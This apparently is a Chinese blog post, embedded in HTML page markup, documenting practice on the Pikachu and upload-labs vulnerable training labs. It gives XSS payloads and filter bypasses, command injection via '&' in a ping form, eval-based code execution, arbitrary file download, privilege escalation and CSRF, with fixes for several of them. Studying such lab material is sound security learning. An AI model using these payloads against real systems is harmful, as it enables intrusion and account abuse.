

<!DOCTYPE html>
<html lang="zh-CN" >



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/config_img/favicon.ico">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#FCFCFC">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="uoload-lab练习upload-labs通关思路及文件上传总结_文件上传upload-labs-CSDN博客 .xss盲打前台界面  提示说有后台登录界面  两者就模拟了用户给管理员发送反馈信息的功能 查看xss_blind.php  这里发送反馈信息是存入数据库的,且是对语句进行了预处理防止sql注入 再看管理员界面的源码admin_login.php  登录成功跳转到该文件  代码首先是">
<meta property="og:type" content="article">
<meta property="og:title" content="pikachu与upload练习">
<meta property="og:url" content="http://example.com/2023/12/04/pikachu%E4%B8%8Eupload-lab%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="uoload-lab练习upload-labs通关思路及文件上传总结_文件上传upload-labs-CSDN博客 .xss盲打前台界面  提示说有后台登录界面  两者就模拟了用户给管理员发送反馈信息的功能 查看xss_blind.php  这里发送反馈信息是存入数据库的,且是对语句进行了预处理防止sql注入 再看管理员界面的源码admin_login.php  登录成功跳转到该文件  代码首先是">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/images/image-20231204181835440.png">
<meta property="og:image" content="http://example.com/images/image-20231204181806892.png">
<meta property="og:image" content="http://example.com/images/image-20231204182031817.png">
<meta property="og:image" content="http://example.com/images/image-20231204182523159.png">
<meta property="og:image" content="http://example.com/images/image-20231204182730623.png">
<meta property="og:image" content="http://example.com/images/image-20231204183541580.png">
<meta property="og:image" content="http://example.com/images/image-20231204184946184.png">
<meta property="og:image" content="http://example.com/images/image-20231204185911857.png">
<meta property="og:image" content="http://example.com/images/image-20231204190010860.png">
<meta property="og:image" content="http://example.com/images/image-20231204202939235.png">
<meta property="og:image" content="http://example.com/images/image-20231204213540865.png">
<meta property="og:image" content="http://example.com/images/image-20231204213753569.png">
<meta property="og:image" content="http://example.com/images/image-20231204215049354.png">
<meta property="og:image" content="http://example.com/images/image-20231204220525155.png">
<meta property="og:image" content="http://example.com/images/image-20231204220735144.png">
<meta property="og:image" content="http://example.com/images/image-20231204221158696.png">
<meta property="og:image" content="http://example.com/images/image-20231204221240224.png">
<meta property="og:image" content="http://example.com/images/image-20231204221849883.png">
<meta property="og:image" content="http://example.com/images/image-20231204221901906.png">
<meta property="og:image" content="http://example.com/images/image-20231204224431786.png">
<meta property="og:image" content="http://example.com/images/image-20231204224549307.png">
<meta property="og:image" content="http://example.com/images/image-20231204225704547.png">
<meta property="og:image" content="http://example.com/images/image-20231204230044832.png">
<meta property="og:image" content="http://example.com/images/image-20231206163115734.png">
<meta property="og:image" content="http://example.com/images/image-20231206163249168.png">
<meta property="og:image" content="http://example.com/images/image-20231206163527350.png">
<meta property="og:image" content="http://example.com/images/image-20231206181319449.png">
<meta property="og:image" content="http://example.com/images/image-20231206181738218.png">
<meta property="og:image" content="http://example.com/images/image-20231206182324985.png">
<meta property="og:image" content="http://example.com/images/image-20231206193208070.png">
<meta property="og:image" content="http://example.com/images/image-20231206193528716.png">
<meta property="og:image" content="http://example.com/images/image-20231206193945612.png">
<meta property="og:image" content="http://example.com/images/image-20231206200112407.png">
<meta property="og:image" content="http://example.com/images/image-20231206200155208.png">
<meta property="og:image" content="http://example.com/images/image-20231206223715105.png">
<meta property="og:image" content="http://example.com/images/image-20231206223839726.png">
<meta property="og:image" content="http://example.com/images/image-20231206223913025.png">
<meta property="og:image" content="http://example.com/images/image-20231220161155042.png">
<meta property="og:image" content="http://example.com/images/image-20231220161703905.png">
<meta property="og:image" content="http://example.com/images/image-20231220161916886.png">
<meta property="og:image" content="http://example.com/images/image-20231220162410538.png">
<meta property="og:image" content="http://example.com/images/image-20231220163418767.png">
<meta property="og:image" content="http://example.com/images/image-20231220162947673.png">
<meta property="og:image" content="http://example.com/images/image-20231220174445622.png">
<meta property="og:image" content="http://example.com/images/image-20231220175051970.png">
<meta property="og:image" content="http://example.com/images/image-20231220175229313.png">
<meta property="og:image" content="http://example.com/images/image-20231220221023494.png">
<meta property="og:image" content="http://example.com/images/image-20231220221207664.png">
<meta property="og:image" content="http://example.com/images/image-20231220221255898.png">
<meta property="og:image" content="http://example.com/images/image-20231220221412490.png">
<meta property="og:image" content="http://example.com/images/image-20231220221627954.png">
<meta property="og:image" content="http://example.com/images/image-20231220221938123.png">
<meta property="og:image" content="http://example.com/images/image-20231220215319810.png">
<meta property="og:image" content="http://example.com/images/image-20231220215453195.png">
<meta property="og:image" content="http://example.com/images/image-20231220215528642.png">
<meta property="og:image" content="http://example.com/images/image-20231220220558225.png">
<meta property="og:image" content="http://example.com/images/image-20231220220629940.png">
<meta property="og:image" content="http://example.com/images/image-20231220224609709.png">
<meta property="og:image" content="http://example.com/images/image-20231220224635544.png">
<meta property="og:image" content="http://example.com/images/image-20231220224923024.png">
<meta property="og:image" content="http://example.com/images/image-20231221144716137.png">
<meta property="og:image" content="http://example.com/images/image-20231221144703240.png">
<meta property="og:image" content="http://example.com/images/image-20231221145139066.png">
<meta property="og:image" content="http://example.com/images/image-20231221145221992.png">
<meta property="og:image" content="http://example.com/images/image-20231221145257145.png">
<meta property="og:image" content="http://example.com/images/image-20231221150823109.png">
<meta property="og:image" content="http://example.com/images/image-20231221154114417.png">
<meta property="og:image" content="http://example.com/images/image-20231221154824012.png">
<meta property="og:image" content="http://example.com/images/image-20231221155050249.png">
<meta property="og:image" content="http://example.com/images/image-20231221155427857.png">
<meta property="og:image" content="http://example.com/images/image-20231221155910766.png">
<meta property="og:image" content="http://example.com/images/image-20231221160005547.png">
<meta property="og:image" content="http://example.com/images/image-20231221194458137.png">
<meta property="og:image" content="http://example.com/images/image-20231221200105698.png">
<meta property="og:image" content="http://example.com/images/image-20231221200344859.png">
<meta property="og:image" content="http://example.com/images/image-20231221205135240.png">
<meta property="og:image" content="http://example.com/images/image-20231221205339285.png">
<meta property="og:image" content="http://example.com/images/image-20231221205516529.png">
<meta property="og:image" content="http://example.com/images/image-20231221212537730.png">
<meta property="og:image" content="http://example.com/images/image-20231221212613993.png">
<meta property="article:published_time" content="2023-12-04T10:16:11.000Z">
<meta property="article:modified_time" content="2023-12-22T06:29:19.742Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/images/image-20231204181835440.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>pikachu与upload练习 - Hexo</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.5","typing":{"enable":true,"typeSpeed":50,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":"https://tongji.baidu.com/main/setting/51493313/home/site/getjs?siteId=19843729","google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null},"path":"window.location.pathname","ignore_local":true},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  
    <!-- Baidu Analytics -->
    <script async>
      if (!Fluid.ctx.dnt) {
        var _hmt = _hmt || [];
        (function() {
          var hm = document.createElement("script");
          hm.src = "https://hm.baidu.com/hm.js?https://tongji.baidu.com/main/setting/51493313/home/site/getjs?siteId=19843729";
          var s = document.getElementsByTagName("script")[0];
          s.parentNode.insertBefore(hm, s);
        })();
      }
    </script>
  

  
    <!-- Google tag (gtag.js) -->
    <script async>
      if (!Fluid.ctx.dnt) {
        Fluid.utils.createScript("https://www.googletagmanager.com/gtag/js?id=", function() {
          window.dataLayer = window.dataLayer || [];
          function gtag() {
            dataLayer.push(arguments);
          }
          gtag('js', new Date());
          gtag('config', '');
        });
      }
    </script>
  

  

  

  

  



  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 78vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Good wine needs no bush</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/config_img/test.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="pikachu与upload练习"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-12-04 18:16" pubdate>
          2023年12月4日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          11k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          90 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">pikachu与upload练习</h1>
            
            
              <div class="markdown-body">
                
                <h3 id="uoload-lab练习"><a href="#uoload-lab练习" class="headerlink" title="uoload-lab练习"></a>uoload-lab练习</h3><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_73767109/article/details/130416277">upload-labs通关思路及文件上传总结_文件上传upload-labs-CSDN博客</a></p>
<h3 id="xss盲打"><a href="#xss盲打" class="headerlink" title=".xss盲打"></a>.xss盲打</h3><p>前台界面</p>
<p><img src="/../images/image-20231204181835440.png" srcset="/img/loading.gif" lazyload alt="image-20231204181835440"></p>
<p>提示说有后台登录界面</p>
<p><img src="/../images/image-20231204181806892.png" srcset="/img/loading.gif" lazyload alt="image-20231204181806892"></p>
<p>两者就模拟了用户给管理员发送反馈信息的功能</p>
<p>查看xss_blind.php</p>
<p><img src="/../images/image-20231204182031817.png" srcset="/img/loading.gif" lazyload alt="image-20231204182031817"></p>
<p>这里发送反馈信息是存入数据库的,且是对语句进行了预处理防止sql注入</p>
<p>再看管理员界面的源码admin_login.php</p>
<p><img src="/../images/image-20231204182523159.png" srcset="/img/loading.gif" lazyload alt="image-20231204182523159"></p>
<p>登录成功跳转到该文件</p>
<p><img src="/../images/image-20231204182730623.png" srcset="/img/loading.gif" lazyload alt="image-20231204182730623"></p>
<p>代码首先是判断账户是否已经登录，然后就根据传入的id查看对应id发的内容，这里可能是因为内容不够多所有是全部显示的，总之这里就是读取了用户写入数据库的信息到下面</p>
<p><img src="/../images/image-20231204183541580.png" srcset="/img/loading.gif" lazyload alt="image-20231204183541580"></p>
<p>这里显示html代码就构成了XSS漏洞</p>
<p>上传:</p>
<p>&lt;script&gt;alert(document.cookie)</script></p>
<p><img src="/../images/image-20231204184946184.png" srcset="/img/loading.gif" lazyload alt="image-20231204184946184"></p>
<p>修复</p>
<p><img src="/../images/image-20231204185911857.png" srcset="/img/loading.gif" lazyload alt="image-20231204185911857"></p>
<p>对上传的信息进行黑名单过滤等操作即可</p>
<p><img src="/../images/image-20231204190010860.png" srcset="/img/loading.gif" lazyload alt="image-20231204190010860"></p>
<h3 id="XSS绕过"><a href="#XSS绕过" class="headerlink" title=".XSS绕过"></a>.XSS绕过</h3><p>本关主要是过滤了&lt;script&gt;没有别的黑名单</p>
<p><img src="/../images/image-20231204202939235.png" srcset="/img/loading.gif" lazyload alt="image-20231204202939235"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$message</span>=<span class="hljs-title function_ invoke__">preg_replace</span>(<span class="hljs-string">&#x27;/&lt;(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/&#x27;</span>, <span class="hljs-string">&#x27;&#x27;</span>, <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;message&#x27;</span>]);<br></code></pre></td></tr></table></figure>

<p>.*表示前后两个字符之间的任何字符，这里表达的意思就是匹配出&lt;&gt;内存在的script(无论嵌入什么字符，这个也可以有效防止双写绕过)</p>
<p>下面使用别的能执行javascript的函数的hmtl语句:</p>
<p>1.<strong>img标签</strong></p>
<ul>
<li>&lt;img src&#x3D;a onerror&#x3D;alert(1)&gt;&#x2F;&#x2F;图片加载错误时触发</li>
<li>&lt;img src&#x3D;a onclick&#x3D;alert(1)&gt;&#x2F;&#x2F;点击图片触发</li>
<li>&lt;img src&#x3D;1 onmouseover&#x3D;alert(1)&gt;&#x2F;&#x2F;鼠标在图片上触发</li>
<li>&lt;img src&#x3D;a onmouseout&#x3D;alert(1)&gt;&#x2F;&#x2F;鼠标从图片上移开触发</li>
</ul>
<p>2.<strong>a标签</strong>(重定向标签)</p>
<ul>
<li>&lt;a href&#x3D;javascript:alert()&gt;</a></li>
<li>&lt;a href&#x3D;”” onclick&#x3D;alert(1)&gt;</a></li>
</ul>
<p>3.input标签</p>
<ul>
<li>&lt;input onfocus&#x3D;”alert(‘xss’);”&gt;&#x2F;&#x2F;点到框就触发</li>
<li>&lt;input type&#x3D;”password” onkeydown&#x3D;alert(1)&gt;&#x2F;&#x2F;在框中一输入就触发</li>
</ul>
<p>4.button标签</p>
<ul>
<li>&lt;button onclick&#x3D;”alert(1)”&gt;enter</button></li>
</ul>
<h3 id="htmlspecialchars"><a href="#htmlspecialchars" class="headerlink" title=".htmlspecialchars()"></a>.<strong>htmlspecialchars()</strong></h3><p>htmlspecialchars()把预定义的字符转换为 HTML 实体</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">htmlspecialchars</span>(<span class="hljs-keyword">string</span>,flags,character-set,double_encode)<br></code></pre></td></tr></table></figure>

<p>预转义的字符：</p>
<figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs 1c"><span class="hljs-meta">&amp;：转换为&amp;amp;</span><br><span class="hljs-string">&quot;：转换为&amp;quot;</span><br>&#x27;：转换为成为 &#x27;<br>&lt;：转换为<span class="hljs-meta">&amp;lt;</span><br>&gt;：转换为<span class="hljs-meta">&amp;gt;</span><br></code></pre></td></tr></table></figure>

<ul>
<li>string：必需，规定要转换的字符串</li>
<li>flags ：可选，规定如何处理引号、无效的编码以及使用哪种文档类型</li>
<li>character-set ：可选，一个规定了要使用的字符集的字符串，如：UTF-8（默认）</li>
<li>double_encode ：可选，布尔值，规定了是否编码已存在的 HTML 实体。</li>
</ul>
<p>flags不设置时默认只转义双引号</p>
<p>对于flags:</p>
<ul>
<li>ENT_COMPAT ：默认仅编码双引号。</li>
<li>ENT_QUOTES：编码双引号和单引号。</li>
<li>ENT_NOQUOTES：不编码任何引号。</li>
</ul>
<p>看到本关的源码</p>
<p><img src="/../images/image-20231204213540865.png" srcset="/img/loading.gif" lazyload alt="image-20231204213540865"></p>
<p>利用这个进行了预处理但是没有包含单引号导致，可以利用单引号闭合</p>
<p><img src="/../images/image-20231204213753569.png" srcset="/img/loading.gif" lazyload alt="image-20231204213753569"></p>
<h3 id="xss之href输出"><a href="#xss之href输出" class="headerlink" title=".xss之href输出"></a>.xss之href输出</h3><p>普通输入查看源码</p>
<p><img src="/../images/image-20231204215049354.png" srcset="/img/loading.gif" lazyload alt="image-20231204215049354"></p>
<p>直接插入在a标签的href中，根据前面的a标签触发语法可以知道可以利用javascript伪代码来执行alert</p>
<p>使用payload:</p>
<figure class="highlight isbl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs isbl"><span class="hljs-variable">javascript</span>:<span class="hljs-function"><span class="hljs-title">alert</span>(<span class="hljs-number">1</span>)</span><br></code></pre></td></tr></table></figure>

<p><img src="/../images/image-20231204220525155.png" srcset="/img/loading.gif" lazyload alt="image-20231204220525155"></p>
<p>成功执行js函数,再来看看源码</p>
<p><img src="/../images/image-20231204220735144.png" srcset="/img/loading.gif" lazyload alt="image-20231204220735144"></p>
<p>可以看到依然是用htmlspecialchars()函数来转义，对比上一题只是多转义了单引号</p>
<p>但是我们刚刚直接使用javasrcipt伪代码不用闭合单引号照样执行js代码，可知<strong>在a标签中的href属性对空值是只是指双引号的时候，单引号形同虚设</strong>实验一下</p>
<p><img src="/../images/image-20231204221158696.png" srcset="/img/loading.gif" lazyload alt="image-20231204221158696"></p>
<p><img src="/../images/image-20231204221240224.png" srcset="/img/loading.gif" lazyload alt="image-20231204221240224"></p>
<p>换成双引号</p>
<p><img src="/../images/image-20231204221849883.png" srcset="/img/loading.gif" lazyload alt="image-20231204221849883"></p>
<p><img src="/../images/image-20231204221901906.png" srcset="/img/loading.gif" lazyload alt="image-20231204221901906"></p>
<h3 id="js输出"><a href="#js输出" class="headerlink" title=".js输出"></a>.js输出</h3><p>输入后没有输出，提示说输入tmac后输出图片看前端源码也看不出什么</p>
<p>直接看源码</p>
<p><img src="/../images/image-20231204224431786.png" srcset="/img/loading.gif" lazyload alt="image-20231204224431786"></p>
<p>这里没有把可控变量放入html输出当中，往下看</p>
<p><img src="/../images/image-20231204224549307.png" srcset="/img/loading.gif" lazyload alt="image-20231204224549307"></p>
<p>再看到这里发现是用了&lt;script&gt;标签来输出，&lt;script&gt;就是xss要的标签,而且从上面看到$ms是我们上输入的可控参数，受前一题启示，<strong>javascript里面是不会对tag和字符实体进行解释的,所以需要进行js转义</strong>，也就是说在&lt;script&gt;&lt;&#x2F;script&gt;内是可以闭合前面的&lt;script&gt;</p>
<p>使用在</p>
<figure class="highlight php-template"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php-template"><span class="language-xml"><span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span></span><br><span class="language-xml">$ms=&#x27;</span><span class="language-php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-keyword">echo</span> <span class="hljs-variable">$jsvar</span>;<span class="hljs-meta">?&gt;</span></span><span class="language-xml">&#x27;;</span><br></code></pre></td></tr></table></figure>

<p>这里就可以闭合前面的&lt;sciprt&gt;了,payload:</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span>alert(1)<span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span>/*<br></code></pre></td></tr></table></figure>

<p><img src="/../images/image-20231204225704547.png" srcset="/img/loading.gif" lazyload alt="image-20231204225704547"></p>
<p>修复的话，这里主要是因为在&lt;script&gt;当中不会对html实体进行解释，如果执意要进行解释的话又会对功能的输出产生影响，最好的办法就是在将html实体放入js中之前先对实体进行字符处理或者敏感词过滤</p>
<p><img src="/../images/image-20231204230044832.png" srcset="/img/loading.gif" lazyload alt="image-20231204230044832"></p>
<h3 id="RCE-ping"><a href="#RCE-ping" class="headerlink" title=".RCE.ping"></a>.RCE.ping</h3><p><img src="/../images/image-20231206163115734.png" srcset="/img/loading.gif" lazyload alt="image-20231206163115734"></p>
<p>随便输入一个域名等了一会发现返回ping的数据包，猜测代码是执行了系统指令ping</p>
<p>查看代码</p>
<p><img src="/../images/image-20231206163249168.png" srcset="/img/loading.gif" lazyload alt="image-20231206163249168"></p>
<p>发现果然如此,对于shell_exec函数是php用于执行系统命令的函数，该函数支持连续执行多条命令</p>
<figure class="highlight arcade"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs arcade"><span class="hljs-symbol">$output</span> = shell_exec(<span class="hljs-string">&#x27;command1; command2&#x27;</span>);<br></code></pre></td></tr></table></figure>

<p>但对于一个command1下还可以通过&amp;连接符来执行多条命令</p>
<p><img src="/../images/image-20231206163527350.png" srcset="/img/loading.gif" lazyload alt="image-20231206163527350"></p>
<p>该漏洞源于没有对输入变量进行检查，这里可以通过严格要求输入的变量只能是数字和小数点(只能是IP)</p>
<p>通过截取小数点之间的字符进行检查，若不是数字则不执行系统命令</p>
<h3 id="RCE-eval"><a href="#RCE-eval" class="headerlink" title=".RCE.eval"></a>.RCE.eval</h3><p><img src="/../images/image-20231206181319449.png" srcset="/img/loading.gif" lazyload alt="image-20231206181319449"></p>
<p>输入后报错，说函数eval使用错误</p>
<p>eval()是一个执行php代码的函数，一开始尝试system(‘ls’);发现没有回显，后面才想起来，我这是windows搭建的环境不执行linux的命令…</p>
<p>使用system(‘dir’);就可以了</p>
<p><img src="/../images/image-20231206181738218.png" srcset="/img/loading.gif" lazyload alt="image-20231206181738218"></p>
<p>看看代码</p>
<p><img src="/../images/image-20231206182324985.png" srcset="/img/loading.gif" lazyload alt="image-20231206182324985"></p>
<p>这里是直接将输入的值直接php代码执行，如果要防御则应该多一个执行系统函数的黑名单或者是限定执行的函数</p>
<h3 id="Unsafe-Filedownload"><a href="#Unsafe-Filedownload" class="headerlink" title=".Unsafe Filedownload"></a>.Unsafe Filedownload</h3><p>打开点击图片即可下载图片</p>
<p>查看html源代码</p>
<p><img src="/../images/image-20231206193208070.png" srcset="/img/loading.gif" lazyload alt="image-20231206193208070"></p>
<p>可以看到,点击后直接进行跳转访问这个文件斌且讲一个文件名参数传入进去，这里就可以猜测到这一个是通过传入的一个文件名来进行文件下载了，如果代码没有对这个参数进行过滤则可以构成任意文件下载</p>
<p>尝试访问这个文件并传入一个文件名</p>
<p><img src="/../images/image-20231206193528716.png" srcset="/img/loading.gif" lazyload alt="image-20231206193528716"></p>
<p>果然可以看一下文件代码</p>
<p><img src="/../images/image-20231206193945612.png" srcset="/img/loading.gif" lazyload alt="image-20231206193945612"></p>
<p>只是判断了文件有无，没有判断文件是否合规的文件名，这就是造成漏洞的原因</p>
<p>修复则是在判断是否存在的基础上加上白名单</p>
<p><img src="/../images/image-20231206200112407.png" srcset="/img/loading.gif" lazyload alt="image-20231206200112407"></p>
<p><img src="/../images/image-20231206200155208.png" srcset="/img/loading.gif" lazyload alt="image-20231206200155208"></p>
<h3 id="垂直越权"><a href="#垂直越权" class="headerlink" title=".垂直越权"></a>.垂直越权</h3><p>首先用提示给的账号登录超级用户(实战是不能这样只能猜)和普通用户，对比两个用户的功能点，发现超级用户多了一个添加用户的功能，点进去发现跳转到另一个文件(在实战中如果在同一个目录下是有可能被扫出来的)猜测这个文件就是实现用户添加功能的，于是尝试用普通用户在登录的状态下去访问，一开始考虑到这个文件可能会有源跳转验证，于是多写入超级用户文件的跳转源。但是后面看了源码发现没有那么严格</p>
<p><img src="/../images/image-20231206223715105.png" srcset="/img/loading.gif" lazyload alt="image-20231206223715105"></p>
<p>通过抓取普通用户登录状态下的包，改成POST传参方式，提交添加用户的信息参数发包，查看数据库</p>
<p><img src="/../images/image-20231206223839726.png" srcset="/img/loading.gif" lazyload alt="image-20231206223839726"></p>
<p>发现添加成功，看源码<strong>op2_admin_edit.php</strong></p>
<p><img src="/../images/image-20231206223913025.png" srcset="/img/loading.gif" lazyload alt="image-20231206223913025"></p>
<p>可见访问该文件实现功能前的验证只是验证了用户是否是登录，连用户等级和跳转来源都没验证这就造成了越权漏洞</p>
<h3 id="CSRF"><a href="#CSRF" class="headerlink" title=".CSRF"></a>.CSRF</h3><p>CSRF是Cross-site request forgery是攻击者通过伪造权限数据包，利用目标自身在登录拥有权限状态下去发送攻击者的数据包造成数据的操作。事实上就是让目标自己去操作攻击者做好的操作。</p>
<h4 id="get"><a href="#get" class="headerlink" title="get"></a><strong>get</strong></h4><p><img src="/../images/image-20231220161155042.png" srcset="/img/loading.gif" lazyload alt="image-20231220161155042"></p>
<p>利用已有账号登录看出功能点，发现是可以修改自己的信息。尝试抓包:</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs http"><span class="hljs-keyword">GET</span> <span class="hljs-string">/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=sex&amp;phonenum=phone&amp;add=adress&amp;email=email&amp;submit=submit</span> <span class="hljs-meta">HTTP/1.1</span><br><span class="hljs-attribute">Host</span><span class="hljs-punctuation">: </span>127.0.0.1<br><span class="hljs-attribute">User-Agent</span><span class="hljs-punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0<br><span class="hljs-attribute">Accept</span><span class="hljs-punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br><span class="hljs-attribute">Accept-Language</span><span class="hljs-punctuation">: </span>zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2<br><span class="hljs-attribute">Accept-Encoding</span><span class="hljs-punctuation">: </span>gzip, deflate<br><span class="hljs-attribute">Connection</span><span class="hljs-punctuation">: </span>close<br><span class="hljs-attribute">Referer</span><span class="hljs-punctuation">: </span>http://127.0.0.1/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=sex&amp;phonenum=phone&amp;add=ad&amp;email=&amp;submit=submit<br><span class="hljs-attribute">Cookie</span><span class="hljs-punctuation">: 